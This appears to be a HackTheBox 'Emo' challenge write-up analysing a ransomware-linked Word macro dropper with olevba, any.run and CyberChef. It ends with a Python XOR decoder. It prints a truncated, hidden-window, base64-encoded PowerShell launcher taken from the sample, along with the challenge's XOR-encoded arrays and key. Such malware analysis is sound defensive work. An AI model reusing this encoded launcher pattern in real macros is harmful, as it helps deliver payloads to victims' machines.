We covered the analysis of an Office document with embedded macro code written in Visual Basic. The document was claimed to cause a ransomware infection, so we performed a static analysis that included extracting relevant strings, calculating the MD5 hash, reviewing the metadata and revealing the hidden macro routine with tools such as olevba. We then submitted the hash to online analysis engines such as VirusTotal, which flagged the document as malicious: it executes a PowerShell command that contacts a C2 server to download further payloads. We also found XOR encryption along with the XOR key, which is used to decrypt characters that had previously been encoded in decimal form. This was part of the HackTheBox Emo challenge.


Challenge Description

WearRansom ransomware just got loose in our company. The SOC has traced the initial access to a phishing attack, a Word document with macros. Take a look at the document and see if you can find anything else about the malware and perhaps a flag.

Video Highlights

In this video, we step into the shoes of an incident responder and analyze a malicious Word document. It contains macro code that executes PowerShell, which performs some XOR encryption and calls a command and control server to drop more payloads on the infected machine. So basically we're going to isolate the infected machine, cut off the internet and clone it for analysis.

We start with static malware analysis by running several commands: extracting relevant strings from the sample, calculating the MD5 hash and extracting the macro routines with tools such as olevba and oledump.py.

The macro routine contains the commands and payloads that are executed on the machine, including the PowerShell command. After the static analysis, we perform the dynamic analysis, which reveals the processes spawned, network connections, registry keys modified and the events triggered. You also have to consider the timestamp when looking up the events in Event Viewer. If, say, you opened the malicious document at 19:35 during the dynamic analysis, use that time to filter for the events that were triggered at exactly that timestamp.

The dynamic analysis report of this sample can be found on any.run.

Some of the domains the sample communicated with are below


Below is the PowerShell command revealed by the dynamic analysis report:

POwersheLL -windowstyle hidden -ENCOD IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAGUAJwAsACcAcgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC4ASQBPA

The PowerShell command above can be decoded in CyberChef with From Base64 followed by Remove null bytes (the encoded command is UTF-16LE text, which is why null bytes appear between the characters). This gives you the full payload, from which we can highlight the variable declarations below:

$FN5ggmsH += (186,141,228,182,177,171,229,236,239,239,239,228,181,182,171,229,234,239,239,228)

$FN5ggmsH += (185,179,190,184,229,151,139,157,164,235,177,239,171,183,236,141,128,187,235,134,128,158,177,176,139)

$FN5ggmsH += (183,154,173,128,175,151,238,140,183,162,228,170,173,179,229)

If we run these values through From Charcode in CyberChef with the base set to decimal, we get a string that is still encrypted with XOR. The key is 0xdf, which can be found in the following line of the original payload after decoding it in CyberChef:

+= ([byte][char]${_} -bxor 0xdf )
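
The same decimal-to-XOR step can be done offline instead of in CyberChef. The Python below is an added example, not code from the original write-up or the challenge: it collects the `$FN5ggmsH` fragments quoted above, reads the key from the `-bxor` line and decodes the result. The function names are this example's own, and it assumes a single one-byte key as seen in this payload.

```python
import re

# Lines quoted on this page from the decoded payload (not the full script).
DECODED_SNIPPET = r"""
$FN5ggmsH += (186,141,228,182,177,171,229,236,239,239,239,228,181,182,171,229,234,239,239,228)
$FN5ggmsH += (185,179,190,184,229,151,139,157,164,235,177,239,171,183,236,141,128,187,235,134,128,158,177,176,139)
$FN5ggmsH += (183,154,173,128,175,151,238,140,183,162,228,170,173,179,229)
+= ([byte][char]${_} -bxor 0xdf )
"""

# `$name = (..)` or `$name += (..)` holding only decimal numbers.
ARRAY_RE = re.compile(r"\$(\w+)\s*\+?=\s*\(([\d\s,]+)\)")
# Operand of PowerShell's -bxor operator, hex or decimal.
KEY_RE = re.compile(r"-bxor\s+(0x[0-9a-f]+|\d+)", re.IGNORECASE)


def collect_arrays(script):
    """Join the numeric fragments of each variable in the order they appear."""
    arrays = {}
    for name, body in ARRAY_RE.findall(script):
        values = [int(v) for v in body.split(",") if v.strip()]
        if any(v > 0xFF for v in values):
            raise ValueError(f"${name} holds values that are not single bytes")
        # PowerShell variable names are case-insensitive, so normalise them.
        arrays.setdefault(name.lower(), []).extend(values)
    return arrays


def find_xor_keys(script):
    """Return every distinct -bxor constant found in the script."""
    found = KEY_RE.findall(script)
    return sorted({int(k, 16) if k.lower().startswith("0x") else int(k) for k in found})


def decode_script(script):
    """XOR each collected array with the script's single-byte key."""
    keys = find_xor_keys(script)
    if len(keys) != 1 or keys[0] > 0xFF:
        raise ValueError(f"expected one single-byte XOR key, found {keys}")
    return {name: bytes(v ^ keys[0] for v in vals).decode("latin-1")
            for name, vals in collect_arrays(script).items()}


if __name__ == "__main__":
    for name, text in decode_script(DECODED_SNIPPET).items():
        print(f"${name} -> {text}")
```

Because the key is read from the script rather than hard-coded, the decoder refuses to guess when it finds no `-bxor` constant or more than one.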
